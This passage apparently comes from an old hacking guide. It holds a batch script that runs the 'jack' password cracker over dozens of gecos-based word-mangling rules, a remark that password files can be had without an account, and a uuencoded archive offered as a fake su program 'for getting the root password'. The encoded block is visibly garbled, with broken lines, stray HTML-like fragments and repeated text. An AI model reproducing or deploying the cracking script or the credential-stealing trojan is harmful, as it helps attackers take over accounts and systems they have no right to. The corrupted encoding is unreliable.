jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1

jpp -gecos:4 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1

jpp -gecos:8 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1

--------------- end of jackhash.bat

You can get password files without an account, see next chapter.

uuencoded file: Fack SU program - For getting the root password.



begin 644 fakesu.zip
M4$L#!!0````(`"\B1")UVD\.'0P``#DP```(`!``8V]N9FEG+FA56`P`DZ/X
M,KH,]S+\`0``M9I;\$8
M6E*O$4WHQAK-K]]S&B0+A&@EFZV:&NL"7Y]S^EP;7?Q($IXOV/+SZC,A$YK3
M,I8T)7$E^3J6+(FS;$M>MLU554GALA\OOKLXN(_E`[F"Y93PA:$Y\2P'\A/G[\CA`1;(>F:U%<+(OB:2K:F@J3U]7+%A+KP MGI+_5$*239Q+(CF)WS@#84A)U95,,N#2LN0E@=M%O&PT^9XM<$M.5)_#G9VZ<(D"N M*'FEVPTO4Y)RT"WGH``3B\(>#K$LJ7W[YYT<)K_%N_)PM0 MV2SC[:=_D#A/ZY>/,X\(9=K:>B&8D2RJ/%%F@MT57:-QZC(#3,+X$UB2QGW!$:H>/)_(%LF%R1*Z!)H.+DME/8THVN:2T%8KCZ/2]"3""K1X9[!%,N25X48*77GHE+>
MB=Z#VE(0@Y;DF>5R1$"VYR5+(SEJ/*1Q-3#KQ'?G7A"%1'W?\0-<%1?*>)S&
M;\O1NSUS2E.!`K]04E8Y2E6!<\)"\`I076UAI:EKC(V[2>3Y]IT]M296UX1`
MJ\6%E94!T1`"3*=<*!_))D*Z;"7Y<=!M>456\1MM]OHCB04$SUX#C)HX*7G;
M(K?&G;5S[\M3P*O&>T`R=#\FB5CQ*DO1&)4`#_L!W1W6F&>R9%__=G*)Z+9W
MD92CLFJIMZ($DRS(2P7:\_JS*.5%F<&R#@(>!6?)/W
M[VXO^7T'ATRM@AR3Q_-Z'1>CW9*8.7NL,)L9WFDSH_<)62XP.P[+%H3^36C/ MK%-ZR[)*((76JLMU](T?>Y$"A;/HR77Z.8?;TC!:VX+BTJ^2EGF<2f_>/CD&2#RH_6[WV\JW,'<03dyxt^:`ea'dg6p?qk$<";*!/pik0mi= _="] 420=" m9vh="" 8836b="">:.[3H#_G:EF/OLNK-,30"OF)MAVS*88S*>+_]PDN&+15^243Y:
M^_B^SA4E?V,I)9X;@*$NR8+&$CH%R,E?$UI(]`I5)%2JKE<[RI>1NCFZ/*C4
MQR;`)(P:,[RT''Y)5`^=N`
M&5'I@_3VKUKQ#8-:#IEYP[(,\C(BVFU<2m,jp>9.8@'[A$D&"JFJ\-'8]BTS
M1-?[C?R=_/J;6@J-N(FAH5FQ)5HV3E/85$'%\5U7/7=E?#-\TZ_U32U%&Q6K
M'$V1?]>V<1?0zys/060'/x[j6j=:";6-z"7u+ny;,_3;@i;9mkn7l$x8s0s3 m="X/HVG">_6$,1B6L:3F##-M<=+EE`HA'M^`S"L1G=6L;8\H-V?(+:37]\1WQH M@&+8Q9^/!+KS?^X7(8',(N(%A?UE>9)5$(4O?->/J2UN:O95\Z8M%]:0Z-X.
M;Z/@$7HBNS\_EVU<2i,lqo#>EYFNO%!5;.<=^==T/55/UX.A8.4)+RF9SXRC M)(V?#=\!MOY)E0N5IJ]8_GN$GE*)BZ2H\!4*AK'$H&V'[44?54(??-VWZL_1 M3R=J`SA=`@&A$A='*^+,('8)DI(UAYJ!28@M('!SE3U?MA(D9R5\\T/&7BF9 M<;B79[':VL`S?/,CQ(SZRLXES=3G=\;#W[JRW;O^&)S:GD!#;QL]?EVGK?<-[3S&/.R+NC6X++)HWZ8C[?W-;F]5X)604(XJ\/NU@\U<+8<`UW7-R;WM M!$\8X[@E,(JI$;C=AZM+=N[HA8]_ELYX(C,='^X*I\?^?HG+.--@-Y516"MM MV]5RC.NI%>%%7:M>MO)-$DNPE%`[7#=HNW$9.G$R<>9H2`E]66^_9QHA[%\P
M:(114Z39+BD_[P*=EFO&Q:AN:9IF!OT3.[Z4)%&V#]M6RV9&4]NQ-'HU4O])
MO4"IT'HX-0=@KR=2,9E80&!,KZ)'ZX-O^I'@P76#@7F!D
M7U2%ZMY%01,&;3$NV,/V?->,YM[IA'O`AO)P!_-6G$)O4,1"U/D"S:1Z,?4%
MJ'9X&--:*[@UQNY]=_+:>65G^"B28CO4?0>A9WJ/FA%F*S*^'*0\!E-W,J3Y
M:%]=*KDN6@[7>%LEHQ6DRA[Z/(QNW2`<%O(*N5^QZAQ4[5[7FHWA<%<"@HG MH'W3V92TR.)$]9'O4WU[$.\JT`".$I*"ORK9_P=X#1C,I\!\K<,#HA>&.UXR
MN57.*P[>'PS-XJ,J>%5=D)]SEM#1KO@>S4VVB:%DN[Y]E->;HR7T%4QA^#J%
MR:ED@#YR2@_Z2HAS\D&L/L'7F?B@4.%*)0O(N#3?=^[-D*Z&C`^8ECY\5/HT
MC,YYDS./]G"\N+U`)Q95&[DW/J03R55O!,,U[D#\TLTED$9"-WSTNAD*@,N\
MBO9G"7]TCW?\/>"0=FHNBQY>*$UTXP14127RV]1PJN##>I)
M<%%D^).GR'3GCB;+-<0<"^o@@5*#=$[5t"-d'0)l,5@m&fh0^k8sl6\t=>,%
M9A\5KP/$:R.P],=(+PD?+F/7IJNK8LFJY'QP&\Q;WW4U&Y"4VV(8XC]Z&D::
M['JCP2TO)2TR#@/1`.9FZKJ^
MAM%S;-IFG&JWWAE@Z&23#D'`QN;]6$M):<;6&L[8FMHS+:F9B891]4,-+0L; MII-@_73\:X['&YGNF+F[W3'WP-LPSB6?QFEGV+SCOWW4R\9)B^M<( MZ.'P`/E?*R"Z+E^D\6#2PO`&#W9OQH8F=P$1ZFDI5A0*[#!Q'D`%O+6FTV$B M?":C7/)X"`=#7A@YH3OP)*EFL3.\VG;LL]R:B5@DC`VB`B,P;7N8@ZWR<-&8 M63/M[`,4?%XY3`DL33I<\W3P&,3=BHK!-';R"SOQM2$MO'EK.W;"6^,AIB('/FS03
M+]7)`5NNE4.0E>A`WV%_HN.
M*&290+>)L_$@R3>AWS1G^F>VT"WJ2+>:6HH44>0Z3.`Y6D[]&YEAD.7[NHX*
M2&\4
M^4U3=<(G;=&I=(EGKD\Y5S@;]AZJM7\,@E-A_T]!#E%%?(%]QSD\SZB[#QUT MD>1XBJ\#WIA..-7#H*\\0SJ870R]9#`O,/4X24.#F<$.`SVN.?+6XE3RU^+6 M<;*ZP/_..3&=&>9M_5_/J6F7BP_"]6+.U.^'M&*"MZ0O>AIXROCZ'!BZ'_C@
M643E?[:CQV;1_HFG!CJ-U.&>%EG$$NEQ>-86E_'Z#"(^\#-\8W865/#D]9Q<@]3`-;^T##/<`)5Y<@9?J<7/' 9=";\L.G3'UP]">;7]0'@\#ZGR^00
M"&]/XL83W=#$#E'L),C68%[5[ZX.4.J#D[@O.-EID%P<\K@X"7/['V`?CCXM M@\';DRSH[W6P^MGK(4]]TOYN^Z.!```M`D```<`$`!EUX>4@S82!!0[JGAR
M%WM,5G+6T>XFE%-__'VS&P@Y]7I]Z$MB[\[.?//-MS/>VR&VMK/]*>WN4LU5
MJZSRNC/4=#9N[5J>=]9KTX5E
MIKQK_(.R3!?=PM3!8T9#4_5[@^H9EVMFT?Q@S5X9TM^RN39SAQU37CY-)K0)S9L54LWB[M6
M5W2I*S:.22&TK+@IUW07_,B)_X)]2JRQ;VG)U@DQ!QD!1**\X+34S<4j%3?* d="*#;ENZ8UHX;A9M)BY@3%^&Q">?K24&#
MT2U]&8S" q="">PIC/^VPRTN.KO1LWFIX1AI6&?\(1L3#U?GX[#..##X.+X?%
MK:1P,2Q&YWE.%]=C&M#-8%P,SR:7@S'=3,8WU_EYGRAG@<7bx">,-J$H8*UF
MKW3K8MJWJ*(#MK:FJ5HRJEFQ7@*9H@K:^?]*!4K;#KJ3)&&\IO&4=$.F\QD]
M6`UQ^.ZG-0PKTMW4!O#9V/Q]?C\G/9VT+.C3:\7L'2RJ@LE5\5NBQ[
M>SM1"`TKOP`Z/*HEV%)WP`(9W%?5DVP<'?2/1.U133'V%DG.90F^SLJ2_J0# M^OZ=DN>%#Q^P\N;-D\75<`0\8G>4BF%9YL5X>%:4@U$^+`4X/4'?P)GD5PAAIOQV@/YU;K7Q#5Z>G+M0
M4*2NJHKG/MR^?Z=]W']'"3<-G$,K[2.63M+?1L5)NIEWQ(NM^+"Y&?%C,SZL M:=A:_8=*K^QK"9\7?R%\&D/'EYZ0=B,.(/L9.Z?N.
M#8J,^OU^NGT:^EM0VFAR)6HQG?F;;9#(I)ON%#FJ4VRH?K_=R<(C#^!M=)/)1NKY3/WW#$T++3-:VB2%+. M0\TN(WG&LEG,,MQNXSQ54V5I)Q(;<=9[]>H5HB^,T_<&OTZTQX-U%:A*$2-?"R&!(\(`_]$FTPU%B1FZ-MH2C7,I0>M..-
M&)7"CW1*.?XTKI^'Q!S#?<9@tr%_yug5l;ho&4yv(lQ*=I!_
MB^;\4@E8_E%UL/Q+GF'W?*>>VF3H*Z$U"M;*\HR-M`Q6%4:!GC%T*MZVQ4"R
MYLU<-@H=XZZN7UEA+OA8IKP#'7#FZ`'7$GU,)DF85AC%,TP#U(976<,K0V<:WB(5")&X$YH#H1( M(\:1Y_$B)_\!4$L#!!0````(`+I,12+5AMY/@@(``,X$```*`!``9F%K97-U M+F1O8U58#`!/J?@R3ZGX,OP!9`!M4TUOTT`0O>^O&$JE@I0X`BXHJ(>J"K2'
M%M0D((00VMAC>XF]:^VLF_K2W\[,KI.T0`Z1]GGFO?EX\U%O$99KV`QP6QK[
M'J9@IJC4]=WE'&8M5>FYT#2`)G@S>3MY!UF6*759:ULAA!JATZ$&8\%9!%=&
MJ"?TH//<]380(SK`X'JH]3T*C,2@B[@2G!#!$&<96tdyi7-2%O)G/>*@-
M!><'*$V#-)'LV@302;PTGH)Z+M,U.L<20`al,tc)a4x*v!?`[qg'3c4q@y_p62bz.0468.xx)?n#!9qm-]:_.nua!>YL$X2\J4\`.F)3S.8J+/
MX><'";<*QE]V_';`2B/,:UDV=9B;TN2`]MYX9UNT(6I0T#[T'7`IE=+V<98m;c]>IY>>Y'UW&S.#\Y40H?.N<#[#'@!96MC.'I)5X9=_SOW65^L9=IAT-/)6B92?[WIX1G"W79\#K
MCRMC*`8MU]-QDR8!D585QF,^&E0*D,X]QIH/'N@T$>^U`+'3T+$Y=WQ3.QY6
M-8E[7B5BMNLX++9!WQ2CGWNQ>VV*`@\^CK2ST';P1-_Y>%-1EGT3M+&4O.5< M.!;QRATN-('%ZU05G\9U&?O6I+B,B"```3A8```P`$`!L:6)G971T97AT+FA56`P`NZ/X,AG\^#+\`0``
MK5AK<]I(%OUL_8H;IVH&7!C;R<;89@NP"_!F7;-;VD9J4-=*:DIJ MF6$S^>]S;DL"\7"<[(XK`=1]^S[.?;;.3BA4T[DT1OYFF@&=GM)`IJF82_*$ M$:&>IS33":G8R"061NE8A.J_]D?3(:*.7JP2-0\,U3IUNOCPX8<&?_Y(-XF4 M--8SLQ2)I!N=Q;X]U:!>[#4=9Q*HE!:)GB<,7U:T+=HI3-H$%,B?96: M1$TS(TD9$K%_!GTB[:O9RL$"^,J$3"`)&D8IZ9E]N!T^TJV,92)">LBFH?*H
MKSP9IY($Y/)*&DB?IBN'R5_2MD5283^A9YFD>*9W#8+XFC"L84)ZP51U1\0K
M"H79$!ZP<&.(#SRMEH%>0.\`W&#)4H4A325EJ9QE8<,!)7WL3>[N'R?4'C[1
MQ_9HU!Y.GEJ@-('&KGR6.1\5+4(%MM`^$;%9`05GT!UU[D#?ONKU>Y,G5ONF
M-QEVQV.ZN1]1FQ[:HTFO\]AOC^CA=TI#D(MGEO#0+G!K45J1K$V#5HF"A%@
M-.VYR]D-K@;]\($F$IA(>@B%)^F4QAD??__^O$%7.C5,.FC3^;N+BXO3B_?G
M/S7H<=R&_2=GCG-V0E?2$_`#P>.ICA"8J]1(1%=--N=-2`Y%HM(Z+:7=-BJ2
M:6XY%%2Q%V:^Y.Q@79N5_8Q8%
M-P;$2(^-)#'5SQ*Z7B$$JA("*3@7(IN."YD$8I&2"%/-?'PY4[$DM]^[Z@TG
M??>.4XF/)W+&(DOY,*`097G;8\J*9=("H;?PRIN<\Z_?[[SL9M=S+I M_F."O9=/.6_WU3NZ<-[*&%GNO*WLK;EAF_WT498G42N$[ZN\0@&2:*I#-B95 M<8yd;&sx<)r6m=`:na;m/hz[+lzxa0)tp2`4kodk''!f>]@WIHTU)X()=,5UEEZB($,;Q%F*?]WH`#*
M+1UWCNG3FA#F_O(+X8'5A(]0G'FA\$?,/)#2[<&8Y3&_\>2ZX[IX*C'*MVLB
MF2-V^1-[,D3VO4!28\\43BB4*"4-'_O]7,[:HQ4#.`PVR\!M6P\^3+7:LU8^
MG=3IO+ZO1TYR?E`!>I/#VW$'J&;MV^Z8L;'E]EF$F2U,Z`5@DUI?3R4B6]ER
MG=>APL>UNLT!?_W($3'+8IME17Y5LI]\#88H1D6BL+S"2!!?YWHK8_->H_)A
M3V2AR74JXJDTKZ([U4XOZIMH@"77TD-]L1&9=]]"P=,L5?'\%(T9"VG>DV<#?2A#/GM1NG<1>P[GW#$@S!#7B`2
M.N&-EL.UIR"*LV@JDY;SN>54XKO3GB`="O`E)]92P]I$B6D(I$0BUT%0]#N1
M&1W!,.1`N$+OI84^-?@W#9NI]%GQN6T/W")M5?PWC#U5OJ7POL^U+Y(C5WC'
ME/P'J'_]5ZLD5)5E-Y3QW`2M+;QO`'%%,\*Y1'AE08CR>2BM5/I8H\.)T'H:
M_38-\^J!>(BE]&TX]*`GPV[`:&1RG#&5+R8R!3!L5UF"C^[L=:+VM@D
MR$#^M$KVM?X/90L:C&][UR6>7I8D;'49:M'V[&:#IT+'"E[5G0#EF,-AZ+U;8?8V"EL*`H)LGPKL-@/RJ_76PZK
MQUZ$XOI^T.X-A^U!]W]&8=<4_q5;?$2,bf,1r09]c97^jv96.#i'^'n)[9^`>&XV4(O/\/@]P,FX$N%)%SG:SV[U!8E0@Y03/PK#,D$,\#Y\Z/N8S*:NAJ9)(7%^.RP)S?`!_1B6W_75D
M]G#='/X:8,NX&B^DA[M5/C&]$E/EE<46cgq:i>O>R-*BB@?V9B;B,CJ+/II'
M&V%D%S05Z:&X0[ORO\7VPU'AJ^0@,-O<% M>M=\CZ$AK0X?ZT&#^)ZWR3-01RKE1F]#::QY:M61,OG`P1?.J+B`VY2NB."1
M9?*Q45GZ"[-@P6O^Y1RRGJ**)D[??4>U?*4<<3'#v>?K3K&"1K09T,JA:6!K
MTM%1B0_1/QW[M:Z>-9[E<-VRA%46Z\'KNE)$*ORVV:T1VB=O5.MY+@+V[0Z@ M;.+Z]^4EO:LL#'K#^Q&6?[ZDG];#Y#S44XP#Y41#FWF/`SK4PD?902HT/:"* MFP@W?\Q]?.-HL-++0-H4$-A9;G(&[N"S$FHO`^4%]CW'E-]+I-I3=O:Q]V#, M2#L31KJ5*;;8Q:$=;<#<]6*3M*SQ:X"]%Q%N4*>LDEM(UUR7V:UB$2N`3M
M)5;P<=W68=IU7V`/0'3&HW-!O2%F!=_0#D=.@P-'Z[
M@QM4Y?_--F^QV@V\K=W/=;Y&EO=(*B^2]L:YN9)M%[12Z&;_"]7J`/%79=[^
MN4U7JD+`=0+U!]=A0FW"I![P?:)ZG]SN:%M"KXL6]2*3G1<,4SE7]N(C%VK[ M%)E#36,[,4B:0;G<6^/=6@7npu'6<2j)06 m="" 1i="">F9?;@=/M*MC&4B0GK(IJ'RJ*\\&:>2!.3R2AI(GZ8KA\E?TK9%4F$_
MH6>9I'BF=PV"^)HPK&%">L%4=4?$*PJ%V1`>L'!CB`\\K9:!7D#O`-Q@R5*%
M(4TE9:F<96'#`25][$WN[A\GU!X^T3IY:H#2!QJY\ECD?%2U"!;;0
M/A&Q60$%9]`==>Y`W[[J]7N3)U;[IC<9=l=cnkd?49l>VJ-)K_/8;X_HX7'T
M<#_N-HG&DA62SA?PFUG\`9,OC5!A"E.?X*T4*H4^!>)9PFN>5,]02)"'`'G=
M*0Y"+9Y;PT"YP:U%:D:Q-@U:)@H18#3MN<&Q$B/C20QU<\2NEXA!*H2`BDX%R*; MC@N9!&*1D@A3S7Q\.5.Q)+??N^H-)WWWCE.)CR=RQB)+^3"@$&5YVV/*BF72 M`J&W\,J;G*-/M0W/.OW^^\[&;7RAA9[KRM[*VY
M89O]]%&6)U$KA.^KO$(!DFBJ0S8F57->L$FVM,E5AJ)%EW&.9&QL^'"""73%=99>HB!#&\19BG_=Z``RBT==X[ITYH0YO[R"^&!U82/4)QYH?!'
MS#R0TNW!F.4QO_'DNN.Z>"HQRK=K(IDC=OD3>S)$]KU`4F//%$XHE"@E#1_[
M_5S.VJ,5`S@,-LO`;5L//DRUVK-6/IW4Z;R^KT=.<+'M;K-`7_]R!$QRV*;945^5;*? M?`V&*$9%HK"\PD@07^=Z*V/S7J/R84]DHF+K[2S1$2OP-Q6AD:^P&L^_K]2>
M7`WTH0SY[4;IW$7L.Y]PQ(,P0UX@$CKAC9;#M:<@BK-H*I.6\[GE5.*[TYX@ M'0KP)2?64L/:1(EI"*1$(M=!4/0[D1D=P3#D0+A"[Z6%/C7X-PV;J?19\;EM M#]PB;57\-XP]5;ZE\+[/M2^2(U=XQY3\!ZA__5>K)%2593>4\=P$K2V\;P!Q
M13/"N41X94&(\GDHK53Z6*/#B=!Z&OTV#?/J@7B(I?1M./2@',IQ7I\-NP&A
MD](2I7NU9T`Y9C#8>B]6V'
MV-@I;" jouul="" gnj="">A.+Z?M#N#8?M0?=_1F'7%/\56WQ$
MC(IC$V?@`(A>[NW]Z,GAN-E"+S_#X/<#)N!+A21 M[53XQO1)3Y97%
M%HY\6J7KWLC2HHH']F8FXC(ZBSZ:1QMA9!FAN$.[\K_%]L-1X:OD(##;
MW+\EZKX@P?;%[K!]A9%OV!_G6.87!7K7?(^A(:T.'^M!@_B>M\DS4$6K5D3+YP,$7SJBX@-N4KHC@D67RL5%9^@NS8,%K_N4Y7#=LH15%NO!
MZ[I21"K\MMFM$=HG;U3K>2X"]NT.H&SB^O?E);VK+`QZP_L1EG^^I)_6P^0\
MU%.,`^5$0YMYCP,ZU,)'V4$J-#V@BIL(-W_,?7SC:+#2RT#:%!#866YR!N[@
MLQ)J+P/E!?8]QY3?2Z3:4W;VL?=@S$@[$T:ZE2FVV,6A'6W`W/5BD[2L\6N`
MO1<1;e"gk));2-=9"@V2
MSN:1B(V[H"*&#CB=Z-.NM".,4SRGK256\''=UF':=5]@#T!TQJ-S0;TA9@7?
MT`Y'3H,#1^G-Y1[X]9+10;7Y;Y?WY2&B2JR#I%;Q7;U18H4?G4V7VQ>SK^^^
MNJT=R9_W=2[]R:>_!'2A]QX'^\4WNX,;5.7_S39OL=H-O*W=SW6^1I;W2"HO
MDO;&N;F2;1>T4NAF_PO5Z@#Q5V7>_KE-5ZI"P'4"]0?784)MPJ0>\'VB>I_< q="J^Q7#[EN*SYM+">?[]!U!+`P04````"``A
M?$4B.1&0DW`'``!6$@``!``0`'-U+F-56`P`WJ/X,H[\^#+\`0``A5AM;]LV
M$/Y<_xjkbs:2x[<`px`e\s`c29l,61sd9<.0!)xb4;86b=1(rjy7y+_ocj0l mr="8P(VVLX]W#X[T\1^5#PL.TB!AT0\'C9#%<="CL?2MF/2D">)&"Y_JHD63(M<>S
M7Z;7\[/+6^B.EB)CHT(Q.1IJ)K,1Z24Q6-7(NYC^=CZ_^^/N:O9E?N'#IT]M
M*W[S1*E8&!]8JAB,>O"^`0*]$>V`,.!$=P^GI^=W=YT/!6^3,AXE\8[)Y^GE
MU<[-I78&9E?[6[7PLJD%-)&U>YBE&^F]Q=W\XMZ
M)@.]M!FQ\!T$OE\RH(B#%O#"0DP`X(Y<8&h2!2ig81(g+!j""95+vmgyy^g#>X<0k&o6&0<[$j/\54b!3_91l7@ 9="B(8,,UH$" j="%_I_@)UA" g="5DA5I">^T:2#H!H7
M-85/]=/UX5B*`4K'=-*5;46,AHB.-QB0V//'1');/46R8K9P@N%E`RS6MH8
M"/15;N#F=_(.QI:>J+2W6-2/@LI>O5(E-;<;RI'30G:WN[TG$OS+9Y'S.2;\K)!*3CCAO98U(=>_;NSQ=``U+1@
M`EM:[-XXW&/H(BD!.>8U="=MVRWD
M<\Z"L6%LJ>@'>TSO)_`V.X4&Z(Q*Q'.ESYT[S$)?WY4,!A0D1^8,&="
